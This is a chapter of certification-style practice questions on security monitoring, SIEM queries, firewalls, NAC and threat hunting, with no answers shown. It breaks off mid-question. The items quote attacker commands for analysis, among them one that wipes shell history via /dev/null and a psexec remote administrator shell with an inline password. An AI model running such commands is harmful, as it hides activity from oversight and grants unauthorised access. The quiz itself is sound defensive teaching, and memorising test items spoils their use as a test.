Chapter 3
Domain 3.0: Security Operations and Monitoring

EXAM OBJECTIVES COVERED IN THIS CHAPTER:

  • 3.1 Given a scenario, analyze data as part of security monitoring activities.
    • Heuristics
    • Trend analysis
    • Network
    • Log review
    • Impact analysis
    • Security information and event management (SIEM) review
    • Query writing
    • Email analysis
  • 3.2 Given a scenario, implement configuration changes to existing controls to improve security.
    • Permissions
    • Whitelisting
    • Blacklisting
    • Firewall
    • Intrusion prevention system (IPS) rules
    • Data loss prevention (DLP)
    • Endpoint detection and response (EDR)
    • Network access control (NAC)
    • Sinkholing
    • Malware signatures
    • Sandboxing
    • Port security
  • 3.3 Explain the importance of proactive threat hunting.
    • Establishing a hypothesis
    • Profiling threat actors and activities
    • Threat hunting tactics
    • Reducing the attack surface area
    • Bundling critical assets
    • Attack vectors
    • Integrated intelligence
    • Improving detection capabilities
  • 3.4 Compare and contrast automation concepts and technologies.
    • Workflow orchestration
    • Scripting
    • Application programming interface (API) integration
    • Automated malware signature creation
    • Data enrichment
    • Threat feed combination
    • Machine learning
    • Use of automation protocols and standards
    • Continuous integration
    • Continuous deployment/delivery

  1. James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
    1. The malware is polymorphic and is being identified as multiple viruses because it is changing.
    2. Different antimalware engines call the same malware package by different names.
    3. VirusTotal has likely misidentified the malware package, and this is a false positive.
    4. The malware contains multiple malware packages, resulting in the matches.
  2. Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?
    1. MemCheck
    2. Performance Monitor
    3. WinMem
    4. Top
  3. Abul wants to identify typical behavior on a Windows 10 system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time and performance over a period of time?
    1. sysmon
    2. sysgraph
    3. resmon
    4. resgraph
  4. The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
    1. Calculating minimum viable signature length
    2. Binary fingerprinting to identify the malware author
    3. Building a similarity graph of similar functions across binaries
    4. Heuristic code analysis of development techniques
  5. How is integrated intelligence most commonly used in a firewall system?
    1. The firewall searches for new IPs to block and creates a STIX feed entry.
    2. The intelligence feed provides firewall rules that are implemented on the firewall in real time.
    3. Threat intelligence is used to provide IP information for rules.
    4. Named threat actors are blocked based on their threat level and resource model.
  6. What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
    1. A scripted application installation
    2. Remote execution of code
    3. A scripted application uninstallation
    4. A zero-day attack
  7. Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?
    1. 80 and 443
    2. 22 and 80
    3. 80 and 8088
    4. 22 and 443

    Use this scenario for questions 8–10.

    Lucy is an SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.

  8. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
    1. Heuristic
    2. Behavior
    3. Availability
    4. Anomaly
  9. After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudo-code as follows:

    Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

    The average administrator at Lucy's organization is responsible for 150–300 machines.

    What danger does Lucy's alert create?

    1. A DDoS that causes administrators to not be able to access systems
    2. A network outage
    3. Administrators may ignore or filter the alerts
    4. A memory spike
  10. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
    1. Trend
    2. Availability
    3. Heuristic
    4. Behavior
  11. Disabling unneeded services is an example of what type of activity?
    1. Threat modeling
    2. Incident remediation
    3. Proactive risk assessment
    4. Reducing the threat attack surface area
  12. Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
    1. A NetBIOS file share
    2. A RADIUS connection
    3. An RDP connection
    4. A Kerberos connection
  13. Angela wants to prevent buffer overflow attacks on a Windows system. What two built-in technologies should she consider?
    1. The memory firewall and the stack guard
    2. ASLR and DEP
    3. ASLR and DLP
    4. The memory firewall and the buffer guard
  14. Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model?
    1. 802.1x
    2. DMARC
    3. SPF
    4. 802.3
  15. Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
    1. The sudoers file
    2. /var/log/sudo
    3. /var/log/auth.log
    4. root's .bash_log
  16. When Pete connects to his organization's network, his PC runs the NAC software his systems administrator installed. The software communicates to the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using?
    1. Agent-based, in-band
    2. Agentless, in-band
    3. Agent-based, out-of-band
    4. Agentless, out-of-band
  17. What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
    1. How often the directory is accessed
    2. If files in the directory have changed
    3. If sensitive data was copied out of the directory
    4. Who has viewed files in the directory
  18. While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
    psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe
    1. The user has opened a command prompt on their workstation.
    2. The user has opened a command prompt on the desktop of a remote workstation.
    3. The user has opened an interactive command prompt as administrator on a remote workstation.
    4. The user has opened a command prompt on their workstation as Administrator.
  19. Brian writes a Snort rule that reads
    alert tcp any any -> 10.10.11.0/24 3306

    What type of traffic will he detect?

    1. MySQL traffic
    2. RDP traffic
    3. LDAP traffic
    4. BGP traffic
  20. What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators?
    1. An IPS
    2. UEBA
    3. An IDS
    4. DMARC
  21. Sadiq wants to deploy an IPS at a network location that will maximize its impact while avoiding unnecessary load. If he wants to place it near the network border shown in the following image, where should he place it?
    Schematic illustration of a network border that deploys an IPS at a network location.
    1. Point A
    2. Point B
    3. Point C
    4. Point D
  22. While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening?
    1. A firewall is blocking connections from occurring
    2. An IPS is blocking connections from occurring
    3. A SYN flood
    4. An ACK blockage
  23. While reviewing Windows event logs for a Windows 10 system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
    1. The system was shut down.
    2. Another antivirus program has interfered with the scan.
    3. The user disabled the scan.
    4. The scan found a file it was unable to scan.
  24. Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
    1. Blacklisting
    2. IP reputation
    3. Whitelisting
    4. Domain reputation
  25. Gabby executes the following command. What is she doing?
    ps -aux | grep apache2 | grep root 
    1. Searching for all files owned by root named apache2
    2. Checking currently running processes with the word apache2 and root both appearing in the output of top
    3. Shutting down all apache2 processes run by root
    4. There is not enough information to answer this question.
  26. While reviewing email headers, Saanvi notices an entry that reads:

    From: “John Smith, CIO” <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11].

    Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?

    1. John Smith's email was forwarded by someone at demo.com.
    2. John Smith's email was sent to someone at demo.com.
    3. The headers were forged to make it appear to have come from John Smith.
    4. The mail.demo.com server is a trusted email forwarding partner for example.com.
  27. Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it?
    1. Spoofing MAC addresses
    2. Providing valid credentials
    3. Spoofing IP addresses
    4. Providing fake credentials
  28. Fiona wants to prevent email impersonation of individuals inside her company. What technology can help prevent this?
    1. IMAP
    2. SPF
    3. DKIM
    4. DMARC
  29. Which of the items from the following list is not typically found in an email header?
    1. Sender IP address
    2. Date
    3. Receiver IP address
    4. Private key

    Questions 30–32 refer to the following scenario:

    Chris is troubleshooting the firewall rulebase that appears here:

    Snapshot of troubleshooting the firewall rule base.
  30. Users are reporting that inbound mail is not reaching their accounts. Chris believes that rule 1 should provide this access. The organization's SMTP server is located at 10.15.1.1. What component of this rule is incorrect?
    1. Protocol
    2. Source port
    3. Destination IP
    4. Destination port
  31. The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong?
    1. The protocol is incorrect.
    2. The rules are misordered.
    3. The source port is not specified.
    4. There is no error in the rule, and Chris should check for other issues.
  32. Rule 4 is designed to allow SSH access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong?
    1. The protocol is incorrect.
    2. The rules are misordered.
    3. The destination port is incorrect.
    4. There is no error in the rule, and Chris should check for other issues.
  33. Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested?
    1. Install host firewalls on the systems
    2. Move to a NAT environment
    3. Install an IPS
    4. None of the above
  34. The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
    1. The threat actor
    2. The targeting method
    3. The attack vector
    4. The organizational weakness
  35. Manish is using a NAC system and wants to allow users who do not meet admission requirements to patch their machines. What technique should he use to allow this?
    1. Deny access to the network and require users to connect to a different network to patch before they reconnect
    2. Build a quarantine network that allows access to update sites and tools
    3. Deny all access and contact tech support to patch the system
    4. Allow access and force a reboot after patching
  36. Lisa is aware that multiple members of her organization fell for a phishing attack. What attack vector should she worry about based on this?
    1. Compromised credentials
    2. Malicious insiders
    3. Ransomware
    4. Brute-force
  37. Matt believes that developers in his organization deployed code that did not implement cookies in a secure way. What type of attack would be aided by this security issue?
    1. SQL injection
    2. A denial-of-service attack
    3. Session hijacking
    4. XSS
  38. What type of attack is a back-off algorithm intended to limit or prevent?
    1. Denial-of-service attacks
    2. Brute-force attacks
    3. Compromised credential-based attacks
    4. Trojans
  39. Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources?
    1. STIX and TAXII
    2. SAML and OCSP
    3. STIX and CAB
    4. SAML and TAXII
  40. Cassandra is documenting a threat actor using the STIX 2.0 standard, and she describes the threat actor as wanting to steal nuclear research data. What type of label would this receive in the STIX taxonomy?
    1. An alias
    2. A goal
    3. Their sophistication
    4. Their resource level
  41. Jamal wants to leverage a framework to improve his threat hunting for network defense. What threat hunting framework should he select to help his team categorize and analyze threats more effectively?
    1. MOPAR
    2. CVSS
    3. MITRE ATT&CK
    4. CAPEC
  42. Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements?
    1. Whitelisting
    2. Port Security
    3. NAC
    4. EAP
  43. During a log review, Mei sees repeated firewall entries as shown here:
    Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
    Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]

    What service is the remote system most likely attempting to access?

    1. H.323
    2. SNMP
    3. MS-SQL
    4. Oracle
  44. While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
    1. A packer
    2. A crypter
    3. A shuffler
    4. A protector
  45. While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP. What should Nara report has occurred?
    [ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
    [ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0 
    1. A denial-of-service attack
    2. A vulnerability scan
    3. A port scan
    4. A directory traversal attack
  46. Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?
    Schematic illustration of a type of traffic by adding a firewall rule.
    1. The firewall
    2. The router
    3. The distribution switch
    4. The Windows 2019 server
  47. The Snort IPS that Adam has configured includes a rule that reads
    alert tcp $EXTERNAL_NET any -> 10.0.10.0/24 80
    (msg:"Alert!";
    content:"http|3a|//www.example.com/download.php"; nocase;
    offset:12; classtype:web-application-activity; sid:5555555; rev:1;)

    What type of detection method is Adam using?

    1. Anomaly-based
    2. Trend-based
    3. Availability-based
    4. Behavioral-based
  48. A system that Carlos is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?
    1. IP-based blacklisting
    2. Dropping all SYN packets
    3. Using a connection rate or volume-limiting filter per IP
    4. Using a route-blocking filter that analyzes common LOIC routes
  49. Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity?
    1. Prepare
    2. Engage
    3. Presence
    4. Effect
  50. Cormac needs to lock down a Windows workstation that has recently been scanned using nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?
    Snapshot of a Windows workstation that has recently been scanned using nmap on a Kali Linux-based system.
    1. 80, 135, 139, and 445
    2. 80, 445, and 3389
    3. 135, 139, and 445
    4. No ports should be open.
  51. Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?
    select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process.action = 'launch'
    1. Processes other than explorer.exe typically do not launch command prompts.
    2. cmd.exe should never launch explorer.exe.
    3. explorer.exe provides administrative access to systems.
    4. cmd.exe runs as administrator by default when launched outside of Explorer.
  52. During Cormac's configuration of his organization's network access control policies, he sets up client OS rules that include the following statements:
    ALLOW Windows 7 version *, Windows 10 version *
    ALLOW OSX version *
    ALLOW iOS 8.1, iOS 9 version *
    ALLOW Android 7.* 

    After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?

    1. Insecure clients
    2. Incorrect NAC client versions
    3. OS version mismatch
    4. Patch level mismatch
  53. Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as?
    1. DNS masquerading
    2. DNS sinkholing
    3. DNS re-sequencing
    4. DNS hierarchy revision
  54. Maria is an Active Directory domain administrator for her company, and she knows that a quickly spreading botnet relies on a series of domain names for command and control, and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems?
    1. Force a BGP update
    2. Set up a DNS sinkhole
    3. Modify the hosts file
    4. Install an antimalware application
  55. While analyzing a malware package, Ryan finds a list of hostnames shown here:
    earnestnessrealsitetest.com
    rvcxestnessrealsitetest.com
    hjbtestnessrealsitetest.com
    agekestnessrealsitetest.com
    sgjxestnessrealsitetest.com
    igjyestnessrealsitetest.com
    zxahestnessrealsitetest.com
    zfrpestnessrealsitetest.com
    hdquestnessrealsitetest.com
    umcuestnessrealsitetest.com
    hrbyestnessrealsitetest.com
    ysrtestnessrealsitetest.com
    kgteestnessrealsitetest.com
    hfsnestnessrealsitetest.com
    njxfestnessrealsitetest.com 

    What has he likely found in the malware package?

    1. A RPG
    2. A DGA
    3. A SPT
    4. A FIN
  56. Mark writes a script to pull data from his security data repository. The script includes the following query:
    select source.name, data.process.cmd, count(*) AS hostcount
    from windows-events where type = 'sysmon' AND
    data.process.action = 'launch' AND data.process.image.file =
    'reg.exe' AND data.process.parentImage.file = 'cmd.exe'

    He then queries the returned data using the following script:

    select source.name, data.process.cmd, count(*) AS hostcount
    from network-events where type = 'sysmon' AND
    data.process.action = 'launch' AND data.process.image.file =
    'cmd.exe' AND data.process.parentImage.file = 'explorer.exe'

    What events will Mark see?

    1. Uses of explorer.exe where it is launched by cmd.exe
    2. Registry edits launched via the command line from Explorer
    3. Registry edits launched via explorer.exe that modify cmd.exe
    4. Uses of cmd.exe where it is launched by reg.exe
  57. Chris operates the point-of-sale (POS) network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the POS terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI DSS and protect his vulnerable systems?
    1. Replace the Windows embedded point of sale terminals with standard Windows systems
    2. Build a custom operating system image that includes the patch
    3. Identify, implement, and document compensating controls
    4. Remove the POS terminals from the network until the vendor releases a patch
  58. Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
    1. Enable host firewalls
    2. Install patches for those services
    3. Turn off the services for each appliance
    4. Place a network firewall between the devices and the rest of the network
  59. Michelle runs the following grep command. What text will it match?
    grep -i example *.txt 
    1. All text files in the current directory with the word example in it
    2. All occurrences of the text example in all files in the current directory with a .txt extension
    3. All occurrences of the lowercase text example in all files in the current directory with a .txt extension
    4. All TXT files with a filename including the word example in the current directory and all subdirectories
  60. Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection?
    1. TLS
    2. VPN
    3. DLP
    4. FDE
  61. Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?
    1. top
    2. ls -mem
    3. mem
    4. memstat
  62. Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort?
    1. Implement logging
    2. Validate all inputs
    3. Parameterize queries
    4. Error and exception handling
  63. Latisha wants to ensure that BYOD workstations that connect to her network meet specific minimum operating system patch level requirements. She also wants to place them into the correct VLAN for the user group that the logged-in user belongs to. She is deploying her solution to an existing, complex network. What solution should she recommend?
    1. Agent-based, in-line NAC
    2. Agentless, in-line NAC
    3. Agent-based, out-of-band NAC
    4. Agentless, out-of-band NAC
  64. Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this?
    1. Group Policy Object
    2. Organizational unit
    3. Active Directory forest
    4. Domain controller
  65. Eric wants to send an email using a digital signature to ensure that the recipient can prove that the email was sent by him and that the content has not changed. What technology is frequently used for this?
    1. S/MIME
    2. IMAP
    3. DKIM
    4. TLS
  66. Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C; which set of commands will accomplish this?
    Schematic illustration of setting up a Linux iptables-based firewall ruleset to prevent access from hosts A and B.
    1. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
      # iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
      # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
    2. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
      # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
      # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
    3. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
      # iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW
      # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP
    4. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
      # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
      # iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
  67. Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?
    1. iptables -A OUTPUT -d 10.24.31.11 -j DROP
    2. iptables -A INPUT -d 10.24.31.11 -j ADD
    3. iptables -block -host 10.24.31.11 -j DROP
    4. iptables -block -ip 10.24.31.11 -j ADD

    Use the following scenario and image to answer questions 68–70.

    While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the information shown in the following image:

    Snapshot of the information obtained from reviewing a system.
  68. What issue should Amanda report to the system administrator?
    1. High network utilization
    2. High memory utilization
    3. Insufficient swap space
    4. High CPU utilization
  69. What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
    1. ps
    2. top
    3. proc
    4. load
  70. What command can Amanda use to terminate the process?
    1. term
    2. stop
    3. end
    4. kill
  71. What type of attack does a network administrator need to be aware of when deploying port security?
    1. MAC address spoofing
    2. IP address spoofing
    3. Denial-of-service attacks
    4. ARP spoofing
  72. Piper wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?
    1. #iptables-policy INPUT DROP
    2. #iptables-policy SERVICE DROP
    3. #iptables-policy OUTPUT DROP
    4. #iptables-policy FORWARD DROP
  73. Syd inputs the following command on a Linux system:
    #echo 127.0.0.1 example.com>> /etc/hosts 

    What has she done?

    1. She has added the system to the allowed hosts file.
    2. She has routed traffic for the example.com domain to the local host.
    3. She has routed local host traffic to example.com.
    4. She has overwritten the hosts file and will have deleted all data except this entry.
  74. While reviewing output from the netstat command, John sees the following output. What should his next action be?
    [minesweeper.exe]
      TCP    127.0.0.1:62522        dynamo:0              LISTENING
    [minesweeper.exe]
      TCP    192.168.1.100          151.101.2.69:https    ESTABLISHED
    1. Capture traffic to 151.101.2.69 using Wireshark
    2. Initiate the organization's incident response plan
    3. Check to see if 151.101.2.69 is a valid Microsoft address
    4. Ignore it; this is a false positive.
  75. What does EDR use to capture data for analysis and storage in a central database?
    1. A network tap
    2. Network flows
    3. Software agents
    4. Hardware agents
  76. While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:
    ln /dev/null ~/.bash_history 

    What action was this user attempting to perform?

    1. Enabling the Bash history
    2. Appending the contents of /dev/null to the Bash history
    3. Logging all shell commands to /dev/null
    4. Allowing remote access from the null shell
  77. Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this?
    1. Reviewing the Message-ID to see if it has been incremented
    2. Checking for the In-Reply-To field
    3. Checking for the References field
    4. You cannot determine if a message was forwarded by analyzing the headers.
  78. While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
    Snapshot of the result obtained from reviewing a file system of a potentially compromised system.
    1. Continue to search for other changes
    2. Run diff against the password file
    3. Immediately change her password
    4. Check the passwd binary against a known good version
  79. Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes too?
    1. Scheduled tasks
    2. Service replacement
    3. Service creation
    4. Autostart registry keys
  80. Matt is reviewing a query that his team wrote for their threat hunting process. What will the following query warn them about?
    select timeInterval(date, '4h'), `data.login.user`,
    count(distinct data.login.machine.name) as machinecount from
    network-events where data.winevent.EventID = 4624 having
    machinecount > 1
    1. Users who log in more than once a day
    2. Users who are logged in to more than one machine within four hours
    3. Users who do not log in for more than four hours
    4. Users who do not log in to more than one machine in four hours
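    The query above is easier to reason about when its clauses are written out as ordinary code. The following is an added example, not part of the question bank: it reimplements the query's semantics in Python over a handful of constructed logon records that use the query's own field names (EventID 4624 is a successful logon; 4625 is a failed one). The function names, the sample data and the four-hour bucket are choices made here for illustration.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Windows logon records keyed by the field names used in the query.
# EventID 4624 is a successful logon, 4625 a failed one. Sample data only.
SAMPLE_EVENTS = [
    {"date": "2019-07-11T08:05:00", "data.winevent.EventID": 4624,
     "data.login.user": "alice", "data.login.machine.name": "WS-01"},
    {"date": "2019-07-11T09:30:00", "data.winevent.EventID": 4624,
     "data.login.user": "alice", "data.login.machine.name": "WS-07"},
    {"date": "2019-07-11T07:50:00", "data.winevent.EventID": 4624,
     "data.login.user": "bob", "data.login.machine.name": "WS-02"},
    {"date": "2019-07-11T08:10:00", "data.winevent.EventID": 4624,
     "data.login.user": "bob", "data.login.machine.name": "WS-03"},
    {"date": "2019-07-11T10:00:00", "data.winevent.EventID": 4624,
     "data.login.user": "carol", "data.login.machine.name": "WS-04"},
    {"date": "2019-07-11T11:15:00", "data.winevent.EventID": 4624,
     "data.login.user": "carol", "data.login.machine.name": "WS-04"},
    {"date": "2019-07-11T10:20:00", "data.winevent.EventID": 4625,
     "data.login.user": "dave", "data.login.machine.name": "WS-05"},
    {"date": "2019-07-11T10:25:00", "data.winevent.EventID": 4625,
     "data.login.user": "dave", "data.login.machine.name": "WS-06"},
]


def time_interval(timestamp, hours=4):
    """Equivalent of timeInterval(date, '4h'): floor to the start of the N-hour bucket."""
    dt = datetime.fromisoformat(timestamp)
    return dt.replace(hour=(dt.hour // hours) * hours, minute=0, second=0, microsecond=0)


def multi_machine_logins(events, hours=4, min_machines=2, event_id=4624):
    """Users with successful logons to at least `min_machines` distinct hosts
    inside one time bucket. Mirrors the query:
      select timeInterval(date,'4h'), user, count(distinct machine) as machinecount
      from network-events where EventID = 4624 having machinecount > 1"""
    machines = defaultdict(set)
    for ev in events:
        if ev["data.winevent.EventID"] != event_id:          # WHERE EventID = 4624
            continue
        key = (time_interval(ev["date"], hours), ev["data.login.user"])  # group by bucket, user
        machines[key].add(ev["data.login.machine.name"])     # count(distinct machine)
    return sorted(
        (bucket.isoformat(), user, len(names))
        for (bucket, user), names in machines.items()
        if len(names) >= min_machines                         # HAVING machinecount > 1
    )
```

    Note how bob escapes the filter: his two logons land in different four-hour buckets, and carol's repeated logons to one machine count as a single distinct host. Bucket boundaries are a known blind spot of interval-based queries; a sliding window closes it at the cost of a more expensive query.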
  81. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
    1. grep
    2. more
    3. less
    4. strings
  82. Which of the following is not a limitation of a DNS sinkhole?
    1. They do not work on traffic sent directly to an IP address.
    2. They do not prevent malware from being executed.
    3. They can be bypassed using a hard-coded DNS server.
    4. They cannot block drive-by-download attempts.
  83. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.
    root       507  0.0  0.1 258268  3288 ?        Ssl  15:52   0:00 /usr/sbin/rsyslogd -n
    message+   508  0.0  0.2  44176  5160 ?        Ss   15:52   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
    root       523  0.0  0.3 281092  6312 ?        Ssl  15:52   0:00 /usr/lib/accountsservice/accounts-daemon
    root       524  0.0  0.7 389760 15956 ?        Ssl  15:52   0:00 /usr/sbin/NetworkManager --no-daemon
    root       527  0.0  0.1  28432  2992 ?        Ss   15:52   0:00 /lib/systemd/systemd-logind
    apache      714  0.0  0.1  27416  2748 ?        Ss   15:52   0:00 /www/temp/webmin
    root       617  0.0  0.1  19312  2056 ?        Ss   15:52   0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
    root       644  0.0  0.1 245472  2444 ?        Sl   15:52   0:01 /usr/sbin/VBoxService
    root       653  0.0  0.0  12828  1848 tty1     Ss+  15:52   0:00 /sbin/agetty --noclear tty1 linux
    root       661  0.0  0.3 285428  8088 ?        Ssl  15:52   0:00 /usr/lib/policykit-1/polkitd --no-debug
    root       663  0.0  0.3 364752  7600 ?        Ssl  15:52   0:00 /usr/sbin/gdm3
    root       846  0.0  0.5 285816 10884 ?        Ssl  15:53   0:00 /usr/lib/upower/upowerd
    root       867  0.0  0.3 235180  7272 ?        Sl   15:53   0:00 gdm-session-worker [pam/gdm-launch-environment]
    Debian-+   877  0.0  0.2  46892  4816 ?        Ss   15:53   0:00 /lib/systemd/systemd --user
    Debian-+   878  0.0  0.0  62672  1596 ?        S    15:53   0:00 (sd-pam)
    1. 508
    2. 617
    3. 846
    4. 714
  84. What is the Security Content Automation Protocol used for?
    1. Assessing configuration compliance
    2. Testing for sensitive data in transit
    3. Testing for sensitive data at rest
    4. Assessing threat levels
  85. Damian has discovered that systems throughout his organization have been compromised for over a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
    1. Criminal
    2. Hacktivist
    3. APT
    4. Unknown
  86. While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
